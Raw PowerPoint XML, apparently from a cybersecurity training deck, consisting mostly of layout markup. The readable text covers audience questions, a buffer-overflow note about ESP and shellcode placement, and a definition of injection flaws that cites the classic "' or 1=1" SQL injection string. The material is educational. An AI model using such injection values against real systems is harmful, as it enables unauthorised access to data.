            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko"/>
              <a:t>for the prevention of damage to reputation (e.g. customer data loss) and finance (e.g. loss of commercial secrets such as IP or business plans)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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Shape 6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ko"/>
              <a:t>Say things like so who thinks Windows is the most insecure OS, or is it MacOS? Linux?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko"/>
              <a:t>Ask Questions like how many here has a android phone, uses OSX.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>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Shape 6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ko"/>
              <a:t>Say things like so who thinks Windows is the most insecure OS, or is it MacOS? Linux?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko"/>
              <a:t>Ask Questions like how many here has a android phone, uses OSX.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>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488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635" name="Shape 6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Shape 6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ko"/>
              <a:t>Say things like so who thinks Windows is the most insecure OS, or is it MacOS? Linux?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko"/>
              <a:t>Ask Questions like how many here has a android phone, uses OSX.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>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316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7" name="Shape 6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US" altLang="ko" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="628" name="Shape 62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ko"/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="ko"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3084332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7" name="Shape 6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US" altLang="ko" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="628" name="Shape 62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ko"/>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="ko"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="155632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7" name="Shape 6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US" altLang="ko" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="628" name="Shape 628"/>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ltLang="ko"/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="ko"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13659619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2105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a:t>Intutively</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> you want to replace this with the ESP register where the shellcode will go, but this will change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>everytime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Therefore,  hardcoding  a  specific  stack  address  would  not  provide  a   reliable  way  of  getting  to  our  buffer.  </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>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a:t>Intutively</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> you want to replace this with the ESP register where the shellcode will go, but this will change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>everytime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Therefore,  hardcoding  a  specific  stack  address  would  not  provide  a   reliable  way  of  getting  to  our  buffer.  </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>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5660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3" name="Shape 33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Lets go through some real life examples of cybersecurity issues recently</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="334" name="Shape 334"/>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7</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6188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ko" dirty="0"/>
              <a:t>Injection flaws, such as SQL, OS, XXE, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" dirty="0"/>
              <a:t>The most famous of this is the  ‘ or 1=1 issue that’s everybody’s introduction to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" dirty="0"/>
              <a:t> injection </a:t>
            </a:r>
            <a:endParaRPr lang="ko" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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ko"/>
              <a:t>https://www.checkmarx.com/2016/04/11/panama-papers-cms-connection/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="350" name="Shape 35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ko" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="ko"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
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4767262"/>
            <a:ext cx="600075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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="700" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="700" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t> Horangi Pte Ltd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572250" y="4767262"/>
            <a:ext cx="2114550"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0" y="457200"/>
            <a:ext cx="9144000" cy="914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pic>
        <p:nvPicPr>
          <p:cNvPr id="51" name="Shape 51"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="537066" y="1716753"/>
            <a:ext cx="785145" cy="785145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="52" name="Shape 52"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2052859" y="1716753"/>
            <a:ext cx="583251" cy="785145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53" name="Shape 53"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3366758" y="1716753"/>
            <a:ext cx="785145" cy="785145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="Shape 54"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4889621" y="1716753"/>
            <a:ext cx="785145" cy="785145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55" name="Shape 55"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6408735" y="1716753"/>
            <a:ext cx="665505" cy="785145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56" name="Shape 56"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7794317" y="1709276"/>
            <a:ext cx="800101" cy="800099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Shape 57"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="2598276"/>
            <a:ext cx="1097279" cy="182879"/>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2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1795846" y="2598276"/>
            <a:ext cx="1097279" cy="182879"/>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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3210691" y="2598276"/>
            <a:ext cx="1097279" cy="182879"/>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body" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4733553" y="2598276"/>
            <a:ext cx="1097279" cy="182879"/>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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6192848" y="2598276"/>
            <a:ext cx="1097279" cy="182879"/>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6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7645728" y="2598276"/>
            <a:ext cx="1097279" cy="182879"/>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body" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381001" y="2957973"/>
            <a:ext cx="1097279" cy="1016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8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1795846" y="2957973"/>
            <a:ext cx="1097279" cy="1016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body" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3210691" y="2957973"/>
            <a:ext cx="1097279" cy="1016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body" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4733553" y="2957973"/>
            <a:ext cx="1097279" cy="1016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14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6192848" y="2957973"/>
            <a:ext cx="1097279" cy="1016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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7645728" y="2957973"/>
            <a:ext cx="1097279" cy="1016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69" name="Shape 69"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631950" y="1618123"/>
            <a:ext cx="0" cy="2444750"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="BFBFBF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="70" name="Shape 70"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3054350" y="1618123"/>
            <a:ext cx="0" cy="2444750"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="BFBFBF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="71" name="Shape 71"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4527550" y="1618123"/>
            <a:ext cx="0" cy="2444750"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="BFBFBF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="72" name="Shape 72"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6013450" y="1618123"/>
            <a:ext cx="0" cy="2444750"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="BFBFBF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="73" name="Shape 73"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7473950" y="1618123"/>
            <a:ext cx="0" cy="2444750"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="BFBFBF"/>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Slide">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="189027" y="642637"/>
            <a:ext cx="8765946" cy="4429725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Shape 76"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="857249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1980950" y="1971075"/>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78" name="Shape 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="926850" y="2106749"/>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79" name="Shape 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6787900" y="3239061"/>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80" name="Shape 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6866336" y="2106750"/>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81" name="Shape 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4008837" y="1700350"/>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82" name="Shape 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7844236" y="3306898"/>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6_Title Slide">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="dk1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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0" y="0"/>
            <a:ext cx="9144000" cy="5143499"/>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6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8_Title Slide">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="lt1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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0" y="2057400"/>
            <a:ext cx="9143998" cy="3086098"/>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Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="60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txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143998" cy="2057400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="440"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2200" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" marR="0" lvl="1" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="8A8A8C"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="8A8A8C"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" marR="0" lvl="2" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="8A8A8C"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="8A8A8C"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" marR="0" lvl="3"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4pPr>
            <a:lvl5pPr marL="1828800" marR="0" lvl="4"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5pPr>
            <a:lvl6pPr marL="2286000" marR="0" lvl="5"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6pPr>
            <a:lvl7pPr marL="2743200" marR="0" lvl="6"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7pPr>
            <a:lvl8pPr marL="3200400" marR="0" lvl="7"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8pPr>
            <a:lvl9pPr marL="3657600" marR="0" lvl="8"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4_Title Slide">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 88"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Shape 89"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143499"/>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Slide">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="EEDDCE"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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0" y="0"/>
            <a:ext cx="9144000" cy="5143499"/>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Slide">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="dk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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143499"/>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0" y="2416175"/>
            <a:ext cx="9144000" cy="2727323"/>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txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143998" cy="2416175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="440"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2200" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" marR="0" lvl="1" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="8A8A8C"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="8A8A8C"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" marR="0" lvl="2" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="8A8A8C"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="8A8A8C"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" marR="0" lvl="3"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4pPr>
            <a:lvl5pPr marL="1828800" marR="0" lvl="4"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5pPr>
            <a:lvl6pPr marL="2286000" marR="0" lvl="5"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6pPr>
